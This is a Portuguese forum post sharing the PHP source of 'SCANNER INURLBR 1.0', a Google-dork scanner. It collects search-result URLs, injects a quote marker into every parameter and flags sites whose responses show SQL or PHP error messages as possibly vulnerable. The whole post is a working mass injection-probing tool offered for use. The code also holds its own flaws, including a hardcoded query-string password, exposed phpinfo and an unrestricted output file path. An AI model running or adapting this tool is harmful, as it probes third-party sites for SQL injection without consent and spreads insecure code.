Tava na web vendo umas coisas quando... vejo isso: um scan de SQLI (MySQL, MS Access, Microsoft SQL Server, Oracle, PostgreSQL) ou erros de programação.
Mais informações estão na própria source aí.
Créditos:blog.inurl.com.br
Mais informações estão na própria source aí.
Código PHP:
<?php
/*
##########################################################################################
* SCANNER INURLBR 1.0
* PHP Version 5.4.7
* php5-curl LIB
* cURL support enabled
* cURL Information 7.24.0
* Apache 2.4
* allow_url_fopen = On
* Motor de busca GOOGLE
* Permissão de Leitura & Escrita
* -------------------------------------------------------------------------------------
* BUSCA POSSÍVEIS VULNERABILIDADES
* SQLI(MySQL,MS ACCESS,Microsoft SQL Server,ORACLE,POSTGRESQL) OU ERROS DE PROGRAMAÇÃO.
*
* GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.
* fb.com/GoogleINURL
* twitter.com/GoogleINURL
* blog.inurl.com.br
##########################################################################################
*/
// Runtime setup and access gate for the page. Every branch below that ends in
// EXIT() stops the request before any of the HTML further down is sent.

// Error reporting is switched off, so the notices raised by the unguarded
// array reads below ($_SESSION['valida'], $_SERVER['HTTP_USER_AGENT'],
// $_GET['comando']) are never shown.
error_reporting(0);
// 0 removes the execution-time limit for the request.
ini_set("max_execution_time", 0);
// NOTE(review): allow_url_fopen is normally a system-level directive; ini_set()
// is not expected to change it at runtime. Confirm before relying on it.
ini_set("allow_url_fopen", 1);
// Default timeout, in seconds, for socket-based streams.
ini_set("default_socket_timeout", 5);
if (!isset($_SESSION)) {
session_start();
}
// NOTE(review): the only access control is a literal password embedded in the
// source, compared with loose == and sent in the query string. A value passed
// this way is recorded in web-server access logs, proxy logs and browser
// history, so requests carrying the "senha" parameter are visible to anyone
// reviewing those logs.
if (isset($_GET['senha']) && $_GET['senha'] == 'googleinurl') { // validate the password
$_SESSION['valida'] = 1; // mark the session as validated
}
// Any session whose flag is not 1 (including a session where the key was
// never set) gets the refusal message and nothing else.
if ($_SESSION['valida'] != 1) { // flag differs from 1: do not render the page
echo 'SEM ACESSO!';
unset($_SESSION['valida']);
EXIT();
}
if (isset($_GET['sair']) && $_GET['sair'] == 'ok') { // log out
unset($_SESSION['valida']);
session_destroy();
EXIT();
}
// Refuse user agents matching "MSIE <digit><any char><1-2 digits>"; the "." in
// the pattern is unescaped, so it matches any character, not only a dot.
if (preg_match('|MSIE ([0-9].[0-9]{1,2})|', $_SERVER['HTTP_USER_AGENT'])) {
echo "<h1 style='text-size:14px;text-align:center;'>Favor usar um navegador que preste!</br>Please use a browser that pay!<br>
<img src='http://1.bp.blogspot.com/_0MpBNlJrdds/TU0x2KYVbQI/AAAAAAAAAbM/ryjvYAy32K4/s320/Fuck%2BYou.png'></h1>";
EXIT();
}
// NOTE(review): phpinfo() prints the full PHP configuration and environment of
// the host. It is reachable by any session that passed the gate above, and
// $_GET['comando'] is read without an isset() check.
if ($_GET['comando'] == 'phpinfo') {
phpinfo();
echo "
<style>
body{
background-color:#0000;
background-image: url('https://fbcdn-sphotos-h-a.akamaihd.net/hphotos-ak-ash3/533575_576672729050119_54987398_n.jpg');
background-repeat: no-repeat;
background-attachment: fixed; }
h2{
color:#fff;
}
h1{
color:#fff;
}
.e {background-color: #000; font-weight: bold; color: #fff;}
.v {background-color: #000; font-weight: bold; color: #fff;}
td, th { border: 1px solid #fff; font-size: 75%; vertical-align: baseline;}
</style>
";
EXIT();
}
// Reset the per-request accumulators that infoserver() fills and
// formatarResult() reads.
$_SESSION['vull_style'] = NULL;
$_SESSION['resultado_vull'] = NULL;
?>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" >
<head>
<title>SCANNER INURLBR 1.0 - [ blog.inurl.com.br ]</title>
<link href='http://fonts.googleapis.com/css?family=Aldrich' rel='stylesheet' type='text/css'>
<style>
body
{
background-color:#000000;
background-repeat: no-repeat;
background-attachment: fixed;
background-image: url('https://fbcdn-sphotos-h-a.akamaihd.net/hphotos-ak-ash3/533575_576672729050119_54987398_n.jpg');
background-width: 100%;
background-height: 100%;
background-size: 100%;
font-family: 'Aldrich', sans-serif;
_height: 100%;
_overflow: auto;
}
h1
{
color:#006400;
text-align:center;
}
info{
color:#fff;
text-align:center;
}
cont{
color:#900000;
text-align:center;
}
vull{
color:#900000;
}
campoHttp{
color:#0066FF;
}
valorHttp{
color:#003399;
}
p,label
{
font-size:20px;
color:#00FF00;
}
a:link, a:visited, a:active {
text-decoration: none;
color:#fff;
}
a:hover {text-decoration: underline;
color:#fff;
font-size:105%;
}
ico{
width: 16px;
height: 16px;
}
.bordas {
background:#000;
border-color: #1C1C1C;
border-width: 1px;
border-style: solid;
margin: auto;
padding:10px;
-moz-border-radius:7px;
-webkit-border-radius:7px;
border-radius:7px;
opacity:0.75;
-moz-opacity: 0.75;
filter: alpha(opacity=75);
}
.resultado {
background:#000;
border-color: #fff;
border-width: 1px;
border-style: solid;
color:#fff;
margin: auto;
width: 95%;
padding:10px;
-moz-border-radius:7px;
-webkit-border-radius:7px;
border-radius:7px;
opacity:0.85;
-moz-opacity: 0.85;
filter: alpha(opacity=85);
}
.botao {
background-color: #000;
font: 14px Arial, sans-serif;
color: #006400;
}
input {
background:#000;
border:1px dashed #006400;
color: #fff;
-moz-border-radius:7px;
-webkit-border-radius:7px;
border-radius:7px;
}
#menu-vertical{
position:fixed;
top:120px;
overflow:hidden;
}
</style>
</style>
<script type="text/javascript">
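/**
 * Open `url` in a pop-up window, appending the screen size as the `w` and `h`
 * query parameters.
 *
 * The window is requested at a fixed 1000x1000; `left` and `top` are derived
 * from the full screen size, exactly as before.
 *
 * @param {string} url Address to open. It must already carry a query string,
 *                     because the size is appended with "&".
 */
function popUpCal(url)
{
    var width = screen.width;
    var height = screen.height;
    var left = parseInt((screen.availWidth / 2) - (width / 2));
    var top = parseInt((screen.availHeight / 2) - (height / 2));
    // Fix: the original concatenation had no comma between "top=" and
    // "screenX=", which fused the two features into one unparseable token.
    var windowFeatures = [
        "width=1000",
        "height=1000",
        "scrollbars=1",
        "status=0",
        "resizable=1",
        "left=" + left,
        "top=" + top,
        "screenX=" + left,
        "screenY=" + top
    ].join(",");
    // window.open() takes (url, target, features); the stray fourth "GET"
    // argument of the original had no meaning there and is dropped.
    window.open(url + "&w=" + width + "&h=" + height, "", windowFeatures);
}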
</script>
</head>
<body >
<center>
<img src='http://1.bp.blogspot.com/-TY7dceLe804/UEBFN6hZW7I/AAAAAAAABM8/ypZu2cl6HCU/s1600/defacement.png' style='height: 100px;'/><br>
<a href="http://blog.inurl.com.br" title="BLOG GOOGLE INURL - BUSCA AVANÇADA" alt="BLOG INURL - BUSCA AVANÇADA">SCANNER INURLBR 1.0 - [ blog.inurl.com.br ]</a>
</center>
<div class='resultado' >
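<?php
/*
 * Search form. Every request value echoed back into an attribute goes through
 * htmlspecialchars() with ENT_QUOTES: the attributes are single-quoted and the
 * values come straight from the request, so an unescaped quote would break out
 * of the attribute. Each field is also tested with its own key; the original
 * tested 'dork' before reading 'proxy' and 'porta'.
 */
?>
<form action="bot.php" method="post">
<label>DORK...: <input type="text" value='<?php echo htmlspecialchars(isset($_POST['dork']) ? $_POST['dork'] : '', ENT_QUOTES, 'UTF-8'); ?>' name="dork" size="60"></label>
<label>PROXY..: <input type="text" value='<?php echo htmlspecialchars(isset($_POST['proxy']) ? $_POST['proxy'] : '', ENT_QUOTES, 'UTF-8'); ?>' name="proxy" size="15"></label>
<label>PORTA..: <input type="text" value='<?php echo htmlspecialchars(isset($_POST['porta']) ? $_POST['porta'] : '', ENT_QUOTES, 'UTF-8'); ?>' name="porta" size="9"></label> /
<label><input class="botao" type="submit" value="Pesquisar..."></label>
<label><a href="#" style='margin:5px;' onclick="javascript:popUpCal('bot.php?comando=phpinfo')">INFOPHP</a></label>
<label><a href="bot.php?sair=ok" style='margin:10px;'>[ x ]</a></label>
<p><label>ARQUIVO DE SAÍDA..: <input type="text" value='<?php echo htmlspecialchars(isset($_POST['arquivo']) ? $_POST['arquivo'] : 'resultados.txt', ENT_QUOTES, 'UTF-8'); ?>' name="arquivo" size="30"></label></p>
</form>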
</div>
<div class='resultado' >
<?php
// Builds the request settings from the submitted form. opcao() prints a
// message and exits when its value is empty, so nothing below runs unless
// both the dork and the output file name were supplied.

// NOTE(review): this appends an empty array as element 0 of $config instead of
// initialising it; `$config = array();` was probably intended.
$config[] = array();
$config['dork'] = urlencode(opcao(isset($_POST['dork']) ? $_POST['dork'] : '', "DORK"));
// $_POST['arquivo'] is read without an isset() check.
$config['arquivo'] = opcao($_POST['arquivo'], "ARQUIVO");
// NOTE(review): proxy host and port are taken from the request as-is and later
// handed to fsockopen() in eviarPacote(), so the request decides which
// host:port this server opens a TCP connection to. Neither value is validated.
$config['ipProxy'] = (isset($_POST['proxy']) && !empty($_POST['proxy'])) ? $_POST['proxy'] : NULL;
$config['porta'] = (isset($_POST['porta']) && !empty($_POST['porta'])) ? $_POST['porta'] : NULL;
// Search path with the URL-encoded dork as the query.
$config['url'] = "/search?q={$config['dork']}&num=1500&btnG=Search";
$config['host'] = "www.google.com.br";
$config['port'] = 80;
// Hand-built HTTP/1.0 GET request, sent in clear text to port 80.
$packet = "GET {$config['url']} HTTP/1.0\r\n";
$packet.="Host: {$config['host']}\r\n";
$packet.="Connection: Close\r\n\r\n";
/**
 * Require a non-empty form value.
 *
 * @param mixed  $valor Value to check.
 * @param string $op    Field label shown in the message when $valor is empty.
 * @return mixed $valor unchanged when it is not empty; otherwise the function
 *               prints the "missing field" message and ends the script.
 */
function opcao($valor, $op) {
    // empty() already covers the unset/null case for a local parameter, so a
    // single check is equivalent to isset() && !empty().
    if (!empty($valor)) {
        return $valor;
    }

    echo "<info>FALTA DEFINIR..::: {$op}</info>
<center>
<p>
<a href='http://blog.inurl.com.br' title='BLOG GOOGLE INURL - BUSCA AVANÇADA' alt='BLOG INURL - BUSCA AVANÇADA'>[ blog.inurl.com.br ]</a>
</p>
</center>
";
    exit();
}
/**
 * Send a raw request over a TCP socket and return everything read back.
 *
 * The connection goes to $config['ipProxy']:$config['porta'] when a proxy is
 * set, otherwise to the resolved address of $config['host'] on
 * $config['port']. A failed connection prints a message and ends the script.
 *
 * @param string $packet Complete request text to write to the socket.
 * @param array  $config Settings array with the keys named above.
 * @return string|null   Concatenated lines read until end of stream.
 */
function eviarPacote($packet, $config) {
    $viaProxy = isset($config['ipProxy']);

    if ($viaProxy) {
        $socket = fsockopen($config['ipProxy'], $config['porta']);
    } else {
        $socket = fsockopen(gethostbyname($config['host']), $config['port']);
    }

    if (!$socket) {
        if ($viaProxy) {
            echo "<info>Proxy não responde {$config['ipProxy']} : {$config['porta']}</info>";
        } else {
            echo "<info>Host não responde {$config['host']} : {$config['port']}</info>";
        }
        die;
    }

    fputs($socket, $packet);

    // Read line by line until the peer closes the connection.
    $response = NULL;
    while (!feof($socket)) {
        $response .= fgets($socket);
    }
    fclose($socket);

    return $response;
}
/**
 * Fetch $url_ with cURL, run the response through verificaErro() and return
 * an HTML fragment describing the responding server.
 *
 * Side effects: sets $_SESSION['vull_style'] and appends "|<url>" to
 * $_SESSION['resultado_vull'] when verificaErro() reports a match.
 *
 * NOTE(review): the returned fragment interpolates the remote header line and
 * the matched-signature text without HTML escaping, so content controlled by
 * the remote host is rendered in the operator's browser as markup.
 *
 * @param string $url_ URL to request.
 * @return string|false HTML fragment, or FALSE from the else branch below.
 */
function infoserver($url_) {
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $url_);
// Return headers together with the body (HEADER on, NOBODY off) as a string.
curl_setopt($c, CURLOPT_HEADER, 1);
curl_setopt($c, CURLOPT_NOBODY, 0);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
// NOTE(review): peer certificate verification is disabled for HTTPS targets.
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_FRESH_CONNECT, 1);
curl_setopt($c, CURLOPT_VERBOSE, 1);
$corpo = (curl_exec($c));
// NOTE(review): curl_exec() returns false on failure and isset(false) is true,
// so a failed transfer still takes this branch and verificaErro() receives
// false; the else branch is only reached for a null value.
if (isset($corpo)) {
$dadoTipoBD = verificaErro($corpo);
// Green link style and a "|url" entry are recorded only when a signature matched.
$_SESSION['vull_style'] = (isset($dadoTipoBD) && !empty($dadoTipoBD)) ? 'style="color:#006400;"' : NULL;
$_SESSION['resultado_vull'].=(isset($dadoTipoBD) && !empty($dadoTipoBD)) ? "|{$url_}" : NULL;
} else {
return FALSE;
}
$server = curl_getinfo($c);
// get_headers() issues a second request to the same URL.
$sys = get_headers($url_);
// $sys['2'] is the third header line; it is shown as "WEB SERVER", presumably
// on the assumption that it is the Server header - the position is not guaranteed.
// The cURL handle is not closed in this function.
return $info = "
<campoHttp><img src='http://icons.iconarchive.com/icons/fatcow/farm-fresh/24/counter-icon.png'/>/ HTTP_CODE:</campoHttp>
<valorHttp>{$server['http_code']}</valorHttp>
<campoHttp><img src='http://icons.iconarchive.com/icons/fatcow/farm-fresh/24/ip-class-icon.png'/>/ IP SERVER:</campoHttp>
<valorHttp>{$server['primary_ip']}</valorHttp>
<campoHttp><img src='http://icons.iconarchive.com/icons/fatcow/farm-fresh/24/door-in-icon.png'/>/ PORTA SERVER:</campoHttp>
<valorHttp>{$server['primary_port']}</valorHttp>
<campoHttp><img src='http://icons.iconarchive.com/icons/fatcow/farm-fresh/24/computer-go-icon.png'/>/ WEB SERVER:</campoHttp>
<valorHttp>{$sys['2']}</valorHttp><br>
<vull>{$dadoTipoBD}</vull>
";
}
/**
 * Extract URLs from $html, request each one through infoserver(), print one
 * result box per URL, then print a summary and append it to a text file.
 *
 * The function echoes its output and has no return statement.
 *
 * NOTE(review): three things in this function handle request or remote data
 * without any validation or escaping:
 *  - extracted URLs are written into an unquoted href and into the page body;
 *  - $_POST['dork'] and $_POST['arquivo'] are interpolated into the summary;
 *  - $_POST['arquivo'] is used unchanged as the path opened in append mode,
 *    so the write is not confined to any directory or file extension.
 *
 * @param string $html Raw response text to scan for URLs.
 */
function formatarResult($html) {
// Collect URL-like tokens: http/https/ftp/ftps schemes or a "www."/"ftp." prefix.
preg_match_all('#\b((((ht|f)tps?://)|(www|ftp)\.)[a-zA-Z0-9\.\#\@\:%_/\?\=\~\-]+)#i', $html, $match);
$contUrl = 1;
$contTotal = 0;
// array_unique() keeps the original keys, which is why each index is tested
// with isset() inside the loop.
$match[1] = array_unique($match[1]);
for ($i = 0; $i < count($match[1]); $i++) {
// Skip URLs containing any of these substrings (search engine and related hosts).
if (isset($match[1][$i]) && !strstr($match[1][$i], "google") && !strstr($match[1][$i], "youtube") && !strstr($match[1][$i], "orkut") && !strstr($match[1][$i], "schema") && !strstr($match[1][$i], "blogger")) {
// The modified URL is built twice: once for the request, once for display.
$info = infoserver(gerarErroDB(urldecode($match[1][$i])));
$url = gerarErroDB(urldecode($match[1][$i]));
// $_SESSION['vull_style'] was just set by infoserver() for this URL.
$url = "<a target='_black' href={$url} {$_SESSION['vull_style']}>{$url}</a>";
echo "<p class='bordas'>
<info>[<cont>{$contUrl}</cont>] - </info> <url>{$url}</url> </br>{$info}
</p>";
$contUrl++;
$contTotal++;
}
}
// The key is reset to NULL at the top of the script and only infoserver()
// appends to it; if it is still unset here the script ends without a summary.
$resultado = (isset($_SESSION['resultado_vull'])) ? $_SESSION['resultado_vull'] : exit();
// Entries are stored as "|url", so the first element after explode() is
// empty; hence the "- 1" on the count.
$resultado = explode("|", $resultado);
$contRes = count($resultado) - 1;
$resultadotxt = NULL;
$nomeArquivo = "{$_POST['arquivo']}";
// The base64 literal decodes to "SCANNER INURLBR 1.0 - [ blog.inurl.com.br ]";
// every report appended to the output file therefore starts with that banner,
// followed by the date, the dork and the list of flagged URLs.
$resultadotxt = base64_decode("U0NBTk5FUiBJTlVSTEJSIDEuMCAtIFsgYmxvZy5pbnVybC5jb20uYnIgXQ==") . " /DATA:" . date("d/m/Y H:i:s") . " /DORK:{$_POST['dork']}\r\nTOTAL VULL:{$contRes}\r\n " . implode("\r\n", $resultado) . "\r\n\r\n";
$resultado = implode("<br>", $resultado);
print_r("<div class='resultado'>
<p>TOTAL DE URL's: <info>{$contTotal}</info></p>
<p>DORK: <info>{$_POST['dork']}</info></p>
<p>TOTAL DE POSSÍVEIS VULL: <info>{$contRes}</info></p>
<p>ARQUIVO COM RESULTADO: <info><a href='{$nomeArquivo}' target='_black'>{$nomeArquivo}</a></info></p>
<p>LISTA: </p>
<p>{$resultado}<p>
</div>");
$_SESSION['resultado_vull'] = NULL;
// Append mode: earlier reports in the same file are kept.
$abrirtxt = fopen($nomeArquivo, "a");
if ($abrirtxt == false) {
die('Não foi possível criar o arquivo.');
}
fwrite($abrirtxt, $resultadotxt);
fclose($abrirtxt);
}
/**
 * Return a label when a text fragment occurs in a response.
 *
 * The check is a plain, case-sensitive substring search via strstr().
 *
 * @param string $html_     Text to search.
 * @param string $verificar Fragment to look for.
 * @param mixed  $bd        Value returned when the fragment is found.
 * @return mixed|null $bd on a match, null otherwise.
 */
function validaBD($html_, $verificar, $bd) {
    if (strstr($html_, $verificar)) {
        return $bd;
    }

    return null;
}
/**
 * Look for known error-message fragments in a response.
 *
 * Signatures are tried in the order listed and the first hit wins. Several
 * of them ('mysql_', 'pg_', 'SQL', 'syntax;', '500 - Internal server error')
 * are short generic substrings, so a match shows only that the text appears
 * somewhere in the page, not that a database error occurred. On the serving
 * side, none of these fragments reaches a client when detailed database and
 * interpreter errors are logged rather than displayed.
 *
 * @param string $html_ Response text to inspect.
 * @return string|null "Tipo de erro: <label> - ERRO: <fragment>" for the first
 *                     matching signature; nothing is returned when none match.
 */
function verificaErro($html_) {
    $assinaturas = array(
        // Database error fragments
        'MYSQL-01' => 'mysql_',
        'MYSQL-02' => 'You have an error in your SQL syntax;',
        'MYSQL-03' => 'Warning: mysql_',
        'MICROSOFT-01' => 'Microsoft JET Database',
        'MICROSOFT-02' => 'ODBC Microsoft Access Driver',
        'MICROSOFT-03' => '500 - Internal server error',
        'MICROSOFT-04' => 'Microsoft OLE DB Provider',
        'MICROSOFT-05' => 'Unclosed quotes',
        'ORACLE-01' => 'Microsoft OLE DB Provider for Oracle',
        'POSTGRESQL-01' => 'pg_',
        'POSTGRESQL-02' => 'Warning: pg_',
        'POSTGRESQL-03' => 'PostgreSql Error:',
        'INDEFINIDO-01' => 'SQL',
        'INDEFINIDO-02' => 'syntax;',
        // PHP / ASP.NET error fragments
        'ERROPHP-01' => 'Warning: include',
        'ERROPHP-02' => 'Fatal error: include',
        'ERROPHP-03' => 'Warning: require',
        'ERROPHP-04' => 'Fatal error: require',
        'ERROASP-01' => 'Version Information: Microsoft .NET Framework',
    );

    foreach ($assinaturas as $rotulo => $trecho) {
        if (validaBD($html_, $trecho, $rotulo)) {
            return "Tipo de erro: {$rotulo} - ERRO: {$trecho}";
        }
    }
    // No signature matched: fall through without a return value.
}
/**
 * Append the literal marker '0x27 to every "&"-separated segment of a URL.
 *
 * The marker is inserted before each "&" and once more at the end of the
 * string, so every request built from the result carries that exact suffix on
 * each parameter value; this makes such requests easy to recognise in
 * web-server access logs.
 *
 * @param string $_url URL to modify.
 * @return string The URL with the marker added to each segment.
 */
function gerarErroDB($_url) {
    // Replacing each "&" is equivalent to the explode()/implode() round trip.
    $marcado = str_replace("&", "'0x27&", $_url);

    return $marcado . "'0x27";
}
// Send the hand-built search request and keep the raw response text.
$html = eviarPacote($packet, $config);
// formatarResult() echoes its report itself and has no return statement, so
// print_r() receives null here.
print_r(formatarResult($html));
?>
<center>
<p>
<a href="http://blog.inurl.com.br" title="BLOG GOOGLE INURL - BUSCA AVANÇADA" alt="BLOG INURL - BUSCA AVANÇADA">[ blog.inurl.com.br ]</a>
</p>
</center>
</div>
</body>